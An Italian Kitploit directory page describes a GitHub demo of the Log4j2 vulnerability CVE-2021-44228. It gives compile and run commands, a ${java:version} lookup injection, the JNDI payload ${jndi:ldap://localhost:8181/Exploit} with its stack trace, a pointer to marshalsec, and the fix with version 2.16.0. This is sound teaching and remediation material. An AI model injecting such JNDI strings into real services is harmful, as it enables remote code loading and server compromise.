Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-vul — Questo progetto serve solo a mostrare la vulnerabilità di Apache Log4j2 - nota anche come CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/bhprin/log4j-vul
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubbhprin/log4j-vul

log4j-vul

Questo progetto serve solo a mostrare la vulnerabilità di Apache Log4j2 - nota anche come CVE-2021-44228

Vedi Repository
93 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4j-vul

Questo progetto serve solo a mostrare la vulnerabilità di Apache Log4j2 - nota anche come CVE-2021-44228

Java:

java version "1.8.0_121"

Compila:

(dalla cartella src) javac -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com\example\Log4jVul.java

Esegui\Esegui:

(dalla cartella src) java -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com.example.Log4jVul Bhanu

Output: ERROR StatusLogger No log4j2 configuration file found. Using default configuration: logging only errors to the console. 11:29:08.081 [main] ERROR com.example.Log4jVul - ** Username: Bhanu**

Dimostrazione della vulnerabilità:

(dalla cartella src) java -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com.example.Log4jVul ${java:version}

Output: ERROR StatusLogger No log4j2 configuration file found. Using default configuration: logging only errors to the console. 11:34:04.110 [main] ERROR com.example.Log4jVul - ** Username: Java version 1.8.0_121**

NOTA: l'output è "Java version 1.8.0_121" ********************

Dimostrazione della vulnerabilità (JNDI):

(dalla cartella src) java -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar -Dlog4j.configurationFile=log4j2.properties com.example.Log4jVul ${jndi:ldap://localhost:8181/Exploit}

Nota: si prega di leggere Java Unmarshaller Security - Trasformare i propri dati in esecuzione di codice. https://github.com/mbechler/marshalsec

Output: 2021-12-22 10:04:25,803 WARN Error looking up JNDI resource [ldap://localhost:8181/Exploit]. javax.naming.ServiceUnavailableException: localhost:8181; socket closed at com.sun.jndi.ldap.Connection.readReply(Connection.java:454) at com.sun.jndi.ldap.LdapClient.ldapBind(LdapClient.java:365) at com.sun.jndi.ldap.LdapClient.authenticate(LdapClient.java:192) at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2788) at com.sun.jndi.ldap.LdapCtx.(LdapCtx.java:319) at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60) at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61) at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202) at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94) at javax.naming.InitialContext.lookup(InitialContext.java:417) at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:128) at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:55) at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:153) at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1041) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:957) at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:847) at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:402) at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:71) at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:36) at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:197) at org.apache.logging.log4j.core.layout.PatternLayout.toSerializable(PatternLayout.java:55) at org.apache.logging.log4j.core.layout.AbstractStringLayout.toByteArray(AbstractStringLayout.java:67) at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:108) at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:99) at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:430) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:409) at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:367) at org.apache.logging.log4j.core.Logger.logMessage(Logger.java:112) at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:727) at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:716) at org.apache.logging.log4j.spi.AbstractLogger.error(AbstractLogger.java:344) at com.example.Log4jVul.main(Log4jVul.java:16)

10:04:25.779 [main] ERROR com.example.Log4jVul - ** Username: ${jndi:ldap://localhost:8181/Exploit}**

Correzione con la versione Log4j 2.16.0

Compila:

(dalla cartella src) javac -classpath .;..\lib\log4j-api-2.16.0.jar;..\lib\log4j-core-2.16.0.jar com\example\Log4jVul.java

Esegui\Esegui:

(dalla cartella src) java -classpath .;..\lib\log4j-api-2.16.0.jar;..\lib\log4j-core-2.16.0.jar com.example.Log4jVul ${java:version}

Output: 11:42:48.815 [main] ERROR com.example.Log4jVul - ** Username: ${java:version}**

Scarica lo strumento